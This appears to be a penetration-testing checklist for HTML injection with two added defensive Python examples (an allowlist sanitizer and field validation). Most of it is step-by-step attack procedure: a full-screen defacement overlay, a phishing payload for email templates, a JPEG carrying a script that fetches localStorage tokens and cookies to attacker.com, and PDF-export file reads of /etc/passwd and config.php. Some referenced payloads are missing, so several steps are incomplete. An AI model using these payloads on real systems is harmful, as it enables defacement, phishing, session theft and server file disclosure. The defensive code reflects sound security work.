HTML Injection
Check List
Methodology
Black Box
Stored
Go to any page that has a user-editable rich text field (ticket or description, comment, bio)
Enter normal text like test <b>bold</b> test and submit
View the saved content as another user or in a private window; if "bold" renders as bold text, limited HTML is allowed
Intercept the save/create request with Burp Suite and send to Repeater
In the parameter that contains the user input, replace the value with this breakout + overlay payload
"><div style="position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,1);z-index:2147483647;"></div>
If the input is already rendered inside a <p> tag, use this version
</p><div style="position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,1);z-index:2147483647;"></div><p>
Send the request and let the content be saved
Log in as a different user or open an incognito/private window and visit any page that displays the saved content (dashboard, ticket list, profile page, forum thread, etc.)
If the entire screen becomes completely black and nothing is clickable, full visual defacement via Stored HTML Injection with the style attribute is confirmed
Works on every platform that uses whitelist-based HTML sanitization but still allows the style attribute on permitted tags such as <div>, <h1>, <b>, <i>, <a>
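Added example (not part of the original checklist): a minimal allowlist sanitizer on the Python standard library showing why the tag list alone does not stop the overlay above. The names (AllowlistSanitizer, WEAK_ATTRS, SAFE_ATTRS, overlay_survives) are hypothetical; the only real difference between the two policies is whether the style attribute is kept on otherwise allowed tags.

```python
from html import escape
from html.parser import HTMLParser

# Tags the rich-text field may keep. The checklist's point is that this list is not the problem.
ALLOWED_TAGS = {"b", "i", "a", "p", "div", "h1"}
# Weak policy: style kept on every allowed tag (the configuration the checklist targets).
WEAK_ATTRS = {tag: {"style"} for tag in ALLOWED_TAGS}
WEAK_ATTRS["a"] = {"href", "style"}
# Hardened policy: no style attribute anywhere; only href on links.
SAFE_ATTRS = {"a": {"href"}}

class AllowlistSanitizer(HTMLParser):
    def __init__(self, allowed_attrs):
        super().__init__(convert_charrefs=True)
        self.allowed_attrs = allowed_attrs
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tag dropped entirely (its text still passes through handle_data)
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in self.allowed_attrs.get(tag, set()):
                continue  # this is where the style attribute is dropped under SAFE_ATTRS
            if name == "href" and not value.lower().startswith(("http://", "https://", "/")):
                continue  # only plain web links, no other URL schemes
            kept.append(f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))  # stray quotes/brackets such as the leading "> become entities

def sanitize(html, allowed_attrs=SAFE_ATTRS):
    p = AllowlistSanitizer(allowed_attrs)
    p.feed(html)
    p.close()
    return "".join(p.out)

# The checklist's overlay payload, kept here as the sample input.
OVERLAY = ('"><div style="position:fixed;top:0;left:0;right:0;bottom:0;'
           'background:rgba(0,0,0,1);z-index:2147483647;"></div>')

def overlay_survives(html, allowed_attrs):
    # True if a full-page fixed overlay would still reach the browser after sanitizing.
    return "position:fixed" in sanitize(html, allowed_attrs)
```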
Email HTML Injection
Go to any property valuation, booking request, or contact form that sends user input to an email template
Fill the form normally (especially the address, street and city fields) and intercept the POST request with Burp Suite
Send the request to Repeater
In the JSON body, locate the address-related fields (commonly street, formattedAddress, address, location, city)
Replace the street or formattedAddress value with your attacker-controlled URL, for example
"street": "https://attacker.com",
"formattedAddress": "https://attacker.com"
Full example payload (works on any similar endpoint)
{
"address": {
"street": "https://attacker.com",
"formattedAddress": "https://attacker.com",
"city": "Click here for your free valuation",
"postalCode": "https://attacker.com"
},
"email": "victim@company.com",
"name": "Please click the link below"
}
Send the request – it will succeed (no 403 if the field is not validated)
Wait for the confirmation or booking email to be sent to the admin/agent/staff
When the victim (employee) opens the email, the address field will be rendered as a clickable link pointing to https://attacker.com
If the victim clicks it, successful Email Template Content Spoofing / Phishing via Trusted Domain is confirmed
Email Invite Manipulation
Log in to your account on target.com
Navigate to your project settings page
Change your project name to a payload such as
<img src="https://miro.app.com/v2/resize:fit:720/format:webp/0*y2OAF_DSarBAjihO.jpg">
Go to the Invite Members section and send an email invitation to any email address you control
Open the received email
You will notice that the HTML image is rendered inline in the email body, proving successful injection
Account Takeover
Go to your profile/shop bio or any field that allows limited HTML
Enter this exact HTML structure and save it
<div class="remote-pagination-container">
<div class="pagination">
<a href="/cloudinary/images/your_image_id?options[delivery_type]=upload">Next page →</a>
</div>
</div>
Upload any valid image to the site (via avatar, product image, shop banner, anywhere that uses Cloudinary)
After upload, grab the image ID from the final URL (it usually looks like s--AbCdEfGh--/v1234567890/image_name.jpg → your_image_id = s--AbCdEfGh--)
Replace your_image_id in the href above with your real Cloudinary image ID
Use a hex editor (https://hexed.it or a local tool) to open your original image file
Go to offset 0x1A (or any safe location after the JPEG headers) and insert your XSS payload exactly like this
<script>fetch('https://attacker.com/steal?token='+localStorage.getItem('auth_token')+'&cookie='+document.cookie)</script>
Save the modified image as a new file (still a valid JPEG)
Update your bio HTML with the new image ID and the exact parameter options[delivery_type]=upload
Final working bio payload
<div class="remote-pagination-container">
<div class="pagination">
<a href="/cloudinary/images/s--NewMaliciousID--/?options[delivery_type]=upload">Next →</a>
</div>
</div>
Save the bio, then go to any victim's shop page or wait for anyone to view your shop/profile
When they click the "Next page →" link, jQuery replaceWith() loads your raw image bytes via same-origin → your embedded script executes → localStorage token + cookies stolen → Account Takeover achieved
Send Message Functionality HTML Injection to Server Side Request Forgery
Log into the target site and check whether there is a point in the application that sends a message to another user or as an email: find the Send Message functionality or Email Form
Enter a normal email like test@example.com and submit the form
Intercept the POST request with Burp Suite and send to Repeater
In the email parameter, replace the value with this exact payload
Send the request and check if the alert pops or if the script renders
If no alert but the field allows injection without @ symbol, try a basic HTML breakout
Send and refresh the page, or view as another user; if Hello renders, HTML Injection is confirmed. Then escalate with an external image load
If the image loads from a third-party host, SSRF potential is confirmed
Then use Burp Collaborator for IP exfiltration
Submit and check Burp Collaborator for HTTP/DNS interactions; if a callback is received, SSRF + CSRF via IP leak is confirmed
Test the email parameter on other input endpoints like /contact, /feedback, /reset, /signup, or /profile as they often reflect input without @ validation
Server File Reading via PDF Export
Go to any file upload feature that supports PDF export like reports, invoices, profiles, documents, attachments
Upload a normal file with a safe name like test.pdf
Trigger PDF generation and download the file, open it to confirm filename appears inside
Intercept the upload POST request with Burp Suite and send to Repeater
In the filename parameter replace the value with this HTML breakout payload
Send the request and generate a new PDF
Open the PDF; if <h1>XSS Test</h1> renders as large text, HTML Injection into the PDF template is confirmed
Then escalate with this JavaScript LFI payload (works in wkhtmltopdf, Chrome PDF, etc.)
Or for Windows servers
Generate the PDF again and open it. If /etc/passwd or system.ini contents are printed inside the PDF, critical Local File Inclusion (LFI) via PDF HTML Injection is confirmed
Then read other sensitive files
file:///etc/hosts
file:///proc/version
file:///var/www/html/config.php
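Added example (not part of the original checklist) covering the server-side fix for both the email template case (address fields above) and the PDF export case (the printed filename): reject URLs and markup in fields that can never legitimately contain them, and escape at the point where the value enters the HTML template. Function names are hypothetical; the PAYLOAD dict is constructed from the checklist's own example body.

```python
import re
from html import escape

# Values that should never appear in a street, city, name or filename field: URLs or raw markup.
URL_RE = re.compile(r"(?i)\b(?:https?|ftp|file)://|\bwww\.")
MARKUP_RE = re.compile(r"[<>]")

class InvalidField(ValueError):
    pass

def validate_plain_field(name, value):
    """Return the stripped value, or raise InvalidField if it looks like a URL or markup."""
    if not isinstance(value, str) or not value.strip():
        raise InvalidField(f"{name}: empty")
    if URL_RE.search(value):
        raise InvalidField(f"{name}: URLs are not allowed")
    if MARKUP_RE.search(value):
        raise InvalidField(f"{name}: markup is not allowed")
    return value.strip()

def check_address(address):
    """Names of the address fields that fail validation, in the order the checklist lists them."""
    rejected = []
    for field in ("street", "formattedAddress", "city", "postalCode"):
        if field in address:
            try:
                validate_plain_field(field, address[field])
            except InvalidField:
                rejected.append(field)
    return rejected

def render_email_vulnerable(address):
    # Raw interpolation: whatever the user typed becomes part of the email HTML.
    return f"<p>Valuation requested for: {address['street']}, {address['city']}</p>"

def render_email_safe(address):
    # Validate first (rejects the URL payload outright), then escape at the insertion point.
    street = escape(validate_plain_field("street", address["street"]))
    city = escape(validate_plain_field("city", address["city"]))
    return f"<p>Valuation requested for: {street}, {city}</p>"

def pdf_title_safe(filename):
    # The PDF export template prints the uploaded filename; escape it rather than trust it.
    return f"<title>{escape(filename)}</title>"

# Constructed request body mirroring the checklist's example (attacker.com is the page's placeholder).
PAYLOAD = {"street": "https://attacker.com", "formattedAddress": "https://attacker.com",
           "city": "Click here for your free valuation", "postalCode": "https://attacker.com"}
```

Note that a phishing sentence in the city field passes this validator unchanged; the control stops the clickable link, not the social-engineering text, so the template should also label user-supplied values as such.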
White Box
Cheat Sheet